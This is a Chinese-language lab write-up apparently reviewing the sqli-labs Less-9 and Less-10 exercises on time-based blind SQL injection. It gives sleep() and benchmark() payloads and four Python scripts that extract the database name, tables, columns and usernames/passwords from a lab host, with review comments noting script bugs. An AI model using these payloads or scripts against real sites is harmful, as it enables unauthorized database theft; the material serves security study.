之前学习了一遍 sqli-labs,这是巩固复习一遍,代码全部手敲,加深印象
延时型 SQL 盲注 #
函数讲解
利用 sleep() 函数进行注入
?id=1' and if(ascii(substr(database(),1,1))=115,sleep(5),1)#
?id=1' union select (if(substring(database(),1,1)=char(115),sleep(5),1)),2,3#
?id=1' and if(ascii(substr((要执行的语句),1,1))=115,sleep(5),1)#
?id=1' union select (if(substring((要执行的语句),1,1)=char(115),sleep(5),1)),2,3#
当条件为真(即猜测正确)时会有 5 秒的时间延时。
利用 benchmark()进行延时注入
?id=1' and (select 1 from (select concat((ascii(substr((要执行的语句),1,1))=115),benchmark(50000000,encode('msg','key')))x from information_schema.tables group by x)a)#
?id=1' and if(ascii(substr((要执行的语句),1,1))=115,benchmark(50000000,encode('msg','key')),1)#
?id=1' union select (if(substring((要执行的语句),1,1)=char(115),benchmark(50000000,encode('msg','key')),1)),2,3#
?id=1' and (select 1 from (select concat((ascii(substr((database()),1,1))=115),benchmark(50000000,encode('msg','key')))x from information_schema.tables group by x)a)#
?id=1' and (select 1 from (select concat((select username from security.users limit 0,1),benchmark(50000000,encode('msg','key')))x from information_schema.tables group by x)a)#
?id=1' and if(ascii(substr(benchmark(50000000,encode('msg','key')),1,1))=115,sleep(5),1)#
?id=1' union select (if(substring((select database() limit 0,1),1,1)=char(115),benchmark(50000000,encode('msg','key')),1)),2,3#
当结果正确的时候,运行 encode('msg','key') 操作 50000000 次,会占用一段时间。
benchmark()函数,可以测试某些特定操作的执行速度。该函数只是简单地返回服务器执行表达式的时间,而不会涉及分析和优化的开销。
MySQL 字符串截取函数:left(), right(), substring(), substring_index(), mid(), substr()。其中 mid(), substr() 等价于 substring() 函数
encode() 对字符串进行加密运算(参见 MySQL 加密解密函数 encode()、decode() 的用法)
Less-9 延时型sql盲注-单引号
猜数据库
?id=1' and if(ascii(substr(database(),1,1))=115,sleep(5),1)--+
?id=1' and if(ascii(substr(database(),2,1))=101,sleep(5),1)--+
?id=1' and if(ascii(substr(database(),3,1))=99,sleep(5),1)--+
结果为 security
执行脚本
# -*- coding: utf-8 -*-
# filename:Less09-1 database_name.py
#
# sqli-labs Less-9 practice script: recovers the current database name one
# character at a time by timing the response to a `sleep(5)` payload.
# Written for Python 2 (print statements). `hackhttp` is a third-party HTTP
# helper; the only contract relied on here is the 5-tuple it returns.
import hackhttp
import re
import time


def database_name(arg):
    """Print the database name recovered from the Less-9 endpoint.

    arg -- base URL ending in the injectable parameter (e.g. '...?id=');
           the URL-encoded payload is appended to it verbatim.
    Side effects: one HTTP request per (position, candidate) pair, progress
    lines on stdout, and the final name. Returns None.
    """
    print "database_name start test..."
    payloads = list('abcdefghijklmnopqrstuvwxyz')  # built but never read below
    name=""
    # NOTE(review): k starts at 0, and substr(..., 0, 1) is an empty string in
    # MySQL, so the first round cannot match and only contributes a space.
    for k in range(15):
        # range() stops before 122, so 'z' is never tried as a candidate.
        for i in range(64,122):
            startTime=time.time()
            hh = hackhttp.hackhttp()
            # URL-encoded form of:
            #   1' and if(ascii(substr(database(),k,1))=i,sleep(5),1)--+
            msg = "1%27%20and%20if(ascii(substr(database(),{k},1))={i},sleep(5),1)--+".format(k=k,i=i)
            code, head, body, redirect_url, log = hh.http(arg+msg)
            count = re.findall("You are in",body)  # assigned but never used; the decision below is timing-only
            # The true branch of if() sleeps 5 s, so a round trip longer than
            # 5 s is read as "candidate i is the character at position k".
            # Ordinary network latency can also cross the threshold and
            # produce a false positive; nothing here retries or confirms.
            if time.time() - startTime > 5:
                name+=chr(i)
                print "第%s位为%s" % (k,i)
                break
        # Separator after each position; also emitted when nothing matched.
        name+=" "
    print "数据库名为: {name}".format(name=name)


if __name__ == '__main__':
    database_name('http://10.10.10.137/sqli-labs/Less-9/?id=')
猜表名
?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 1,1),1,1))=114,sleep(5),1)--+
?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 1,1),2,1))=101,sleep(5),1)--+
?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 1,1),3,1))=102,sleep(5),1)--+
结果为 emails referers uagents users
执行脚本
# -*- coding: utf-8 -*-
# filename:Less09-2 table_name.py
#
# sqli-labs Less-9 practice script: recovers table names of the `security`
# schema character by character, using the response time of a `sleep(5)`
# payload as the oracle. Python 2 (print statements); `hackhttp` is a
# third-party HTTP helper returning the 5-tuple unpacked below.
import hackhttp
import re
import time


def table_name(arg):
    """Print the table names recovered from the Less-9 endpoint.

    arg -- base URL ending in the injectable parameter (e.g. '...?id=');
           the URL-encoded payload is appended to it verbatim.
    Side effects: one HTTP request per (row, position, candidate) triple,
    progress lines on stdout, and the joined names. Returns None.
    """
    print "table_name start test..."
    payloads = list('abcdefghijklmnopqrstuvwxyz0123456789@_.')  # built but never read below
    table_name=""  # local shadows the function name inside this scope
    database_name=""  # never used
    # k selects the row via `limit k,1`; the loop tries rows 0..4.
    for k in range(5):
        # Positions 1..9 only: a name longer than 9 characters would be cut off.
        for i in range(1,10):
            # Candidates 'A'(65)..'y'(121); range() excludes 122, so 'z' is never tried.
            for j in range(65,122):
                startTime=time.time()
                hh = hackhttp.hackhttp()
                # URL-encoded form of:
                #   1' and if(ascii(substr((select table_name from information_schema.tables
                #       where table_schema='security' limit k,1),i,1))=j,sleep(5),1)--+
                msg = "1%27%20and%20if(ascii(substr((select%20table_name%20from%20information_schema.tables%20where%20table_schema=%27security%27%20limit%20{k},1),{i},1))={j},sleep(5),1)--+".format(k=k,i=i,j=j)
                code, head, body, redirect_url, log = hh.http(arg+msg)
                count = re.findall("You are in",body)  # assigned but never used; the decision below is timing-only
                # A round trip over 5 s is read as the sleep(5) branch having run,
                # i.e. candidate j is at position i of row k. Latency alone can
                # cross the threshold; there is no retry or confirmation.
                if time.time() - startTime > 5:
                    table_name+=chr(j)
                    print "第%s个表的第%s位的ASCII码值是%s" % (k+1,i,j)
                    break
        # Separator between table names; also emitted for an empty row.
        table_name+=" "
    print "security 数据库的表名为: {table_name}".format(table_name=table_name)


if __name__ == '__main__':
    table_name('http://10.10.10.137/sqli-labs/Less-9/?id=')
猜列名
?id=1' and if(ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1))=117,sleep(5),1)--+
?id=1' and if(ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),2,1))=115,sleep(5),1)--+
?id=1' and if(ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),3,1))=101,sleep(5),1)--+
结果为 user_id first_nam last_name user password
执行脚本
# -*- coding: utf-8 -*-
# filename:Less09-3 column_name.py
#
# sqli-labs Less-9 practice script: recovers column names of the `users`
# table character by character, using the response time of a `sleep(5)`
# payload as the oracle. Python 2 (print statements); `hackhttp` is a
# third-party HTTP helper returning the 5-tuple unpacked below.
import hackhttp
import re
import time


def column_name(arg):
    """Print the column names recovered from the Less-9 endpoint.

    arg -- base URL ending in the injectable parameter (e.g. '...?id=');
           the URL-encoded payload is appended to it verbatim.
    Side effects: one HTTP request per (row, position, candidate) triple,
    progress lines on stdout, and the joined names. Returns None.
    """
    print "column_name start test..."
    payloads = list('abcdefghijklmnopqrstuvwxyz0123456789@_.')  # built but never read below
    column_name=""  # local shadows the function name inside this scope
    database_name=""  # never used
    # k selects the row via `limit k,1`; the loop tries rows 0..4.
    for k in range(5):
        # Positions 1..9 only: a 10-character name (e.g. first_name) comes
        # out truncated to 9 characters.
        for i in range(1,10):
            # Candidates 'A'(65)..'y'(121); range() excludes 122, so 'z' is never tried.
            for j in range(65,122):
                startTime=time.time()
                hh = hackhttp.hackhttp()
                # URL-encoded form of:
                #   1' and if(ascii(substr((select column_name from information_schema.columns
                #       where table_name='users' limit k,1),i,1))=j,sleep(5),1)--+
                # Note the filter is on table_name only, not on the schema.
                msg = "1%27%20and%20if(ascii(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name=%27users%27%20limit%20{k},1),{i},1))={j},sleep(5),1)--+".format(k=k,i=i,j=j)
                code, head, body, redirect_url, log = hh.http(arg+msg)
                count = re.findall("You are in",body)  # assigned but never used; the decision below is timing-only
                # A round trip over 5 s is read as the sleep(5) branch having run,
                # i.e. candidate j is at position i of row k. Latency alone can
                # cross the threshold; there is no retry or confirmation.
                if time.time() - startTime > 5:
                    column_name+=chr(j)
                    print "第%s个列的第%s位的ASCII码值是%s" % (k+1,i,j)
                    break
        # Separator between column names; also emitted for an empty row.
        column_name+=" "
    print "security 数据库的 user 表的列名为: {column_name}".format(column_name=column_name)


if __name__ == '__main__':
    column_name('http://10.10.10.137/sqli-labs/Less-9/?id=')
猜数据
?id=1' and if(ascii(substr((select username from security.users limit 0,1),1,1))=68,sleep(5),1)--+
?id=1' and if(ascii(substr((select username from security.users limit 0,1),2,1))=117,sleep(5),1)--+
?id=1' and if(ascii(substr((select username from security.users limit 0,1),3,1))=109,sleep(5),1)--+
结果为
username: Dumb Angelina Dummy secure stupid superman batman admin admin admin password: Dumb Ikillyo pssword crappy stupidity genious moble admin admin admin
运行脚本
# -*- coding: utf-8 -*-
# filename:Less09-4 data.py
#
# sqli-labs Less-9 practice script: recovers values of the username and
# password columns of security.users character by character, using the
# response time of a `sleep(5)` payload as the oracle. Python 2 (print
# statements); `hackhttp` is a third-party HTTP helper returning the
# 5-tuple unpacked below.
import hackhttp
import re
import time


def data(arg):
    """Print the column values recovered from the Less-9 endpoint.

    arg -- base URL ending in the injectable parameter (e.g. '...?id=');
           the URL-encoded payload is appended to it verbatim.
    Side effects: one HTTP request per (column, row, position, candidate)
    tuple, progress lines on stdout, and the accumulated values. Returns None.
    """
    print "data start test..."
    payloads = list('abcdefghijklmnopqrstuvwxyz0123456789@_.-+*/')  # built but never read below
    payload2 = ['username','password']
    data="username: "  # local shadows the function name inside this scope
    for k in payload2: # the two column names to read
        for x in range(10): # assumes at most ten rows per column
            # Positions 1..9 only: a value longer than 9 characters is cut off.
            for i in range(1,10): # position i of the value is matched against ASCII code j
                # Candidates 'A'(65)..'y'(121); range() excludes 122, so 'z' is never tried.
                for j in range(65,122): #
                    startTime=time.time()
                    hh = hackhttp.hackhttp()
                    # URL-encoded form of:
                    #   1' and if(ascii(substr((select k from security.users limit 0,1),i,1))=j,sleep(5),1)--+
                    # NOTE(review): the template has no `{x}` placeholder and the
                    # LIMIT is fixed at `0,1`, so every x iteration queries the
                    # same first row; x only affects the progress message.
                    msg = "1%27%20and%20if(ascii(substr((select%20{k}%20from%20security.users%20limit%200,1),{i},1))={j},sleep(5),1)--+".format(k=k,x=x,i=i,j=j)
                    code, head, body, redirect_url, log = hh.http(arg+msg)
                    count = re.findall("You are in",body)  # assigned but never used; the decision below is timing-only
                    # A round trip over 5 s is read as the sleep(5) branch having
                    # run, i.e. candidate j is at position i. Latency alone can
                    # cross the threshold; there is no retry or confirmation.
                    if time.time() - startTime > 5:
                        data+=chr(j)
                        print "%s列的第%s个数据的第%s位的ASCII码值是%s" % (k,x+1,i,j)
                        break
            # Tab-separate the values of one column.
            data += "\t"
        # Print everything accumulated so far (the username line is printed
        # again together with the password line on the second pass).
        print "{data}".format(data=data)
        # Label for the next column; appended after the last column too,
        # but never printed.
        data += "\npassword: "


if __name__ == '__main__':
    data('http://10.10.10.137/sqli-labs/Less-9/?id=')
Less-10 延时型sql盲注-双引号
函数讲解
?id=1" union select (if(substring(database(),1,1)=char(115),benchmark(50000000,encode('msg','key')),null)),2,3--+
当结果正确的时候,运行 encode('msg','key') 操作 50000000 次,会占用一段时间。
benchmark()函数,可以测试某些特定操作的执行速度。该函数只是简单地返回服务器执行表达式的时间,而不会涉及分析和优化的开销。
MySQL 字符串截取函数:left(), right(), substring(), substring_index(), mid(), substr()。其中 mid(), substr() 等价于 substring() 函数
encode() 对字符串进行加密运算(参见 MySQL 加密解密函数 encode()、decode() 的用法)
猜数据库名
?id=1" and if(ascii(substr(database(),1,1))=115,benchmark(50000000,encode('msg','key')),1)--+
?id=1" union select (if(substring(database(),1,1)=char(115),benchmark(50000000,encode('msg','key')),null)),2,3--+
?id=1" union select (if(substring(database(),2,1)=char(101),benchmark(50000000,encode('msg','key')),null)),2,3--+
?id=1" union select (if(substring(database(),3,1)=char(99),benchmark(50000000,encode('msg','key')),null)),2,3--+
结果为:security
猜表名
?id=1" union select (if(substring((select table_name from information_schema.tables where table_schema='security' limit 1,1),1,1)=char(114),benchmark(50000000,encode('msg','key')),null)),2,3--+
?id=1" union select (if(substring((select table_name from information_schema.tables where table_schema='security' limit 1,1),2,1)=char(101),benchmark(50000000,encode('msg','key')),null)),2,3--+
?id=1" union select (if(substring((select table_name from information_schema.tables where table_schema='security' limit 1,1),3,1)=char(102),benchmark(50000000,encode('msg','key')),null)),2,3--+
结果为:emails referers uagents users
猜列名
?id=1" union select (if(substring((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1)=char(117),benchmark(50000000,encode('msg','key')),null)),2,3--+
?id=1" union select (if(substring((select column_name from information_schema.columns where table_name='users' limit 0,1),2,1)=char(115),benchmark(50000000,encode('msg','key')),null)),2,3--+
?id=1" union select (if(substring((select column_name from information_schema.columns where table_name='users' limit 0,1),3,1)=char(101),benchmark(50000000,encode('msg','key')),null)),2,3--+
结果为:user_id first_nam last_name user password
猜数据
?id=1" union select(if(substr((select password from security.users limit 0,1),1,1)=char(68),benchmark(50000000,encode('msg','key')),null)),2,3--+
?id=1" and if(ascii(substr((select username from security.users limit 0,1),1,1))=68,benchmark(50000000,encode('msg','key')),null)--+
?id=1" union select(if(substr((select password from security.users limit 0,1),2,1)=char(117),benchmark(50000000,encode('msg','key')),null)),2,3--+
?id=1" and if(ascii(substr((select username from security.users limit 0,1),2,1))=117,benchmark(50000000,encode('msg','key')),null)--+
?id=1" union select(if(substr((select password from security.users limit 0,1),3,1)=char(109),benchmark(50000000,encode('msg','key')),null)),2,3--+
?id=1" and if(ascii(substr((select username from security.users limit 0,1),3,1))=109,benchmark(50000000,encode('msg','key')),null)--+
结果为:
username: Dumb Angelina Dummy secure stupid superman batman admin admin admin password: Dumb Ikillyo pssword crappy stupidity genious moble admin admin admin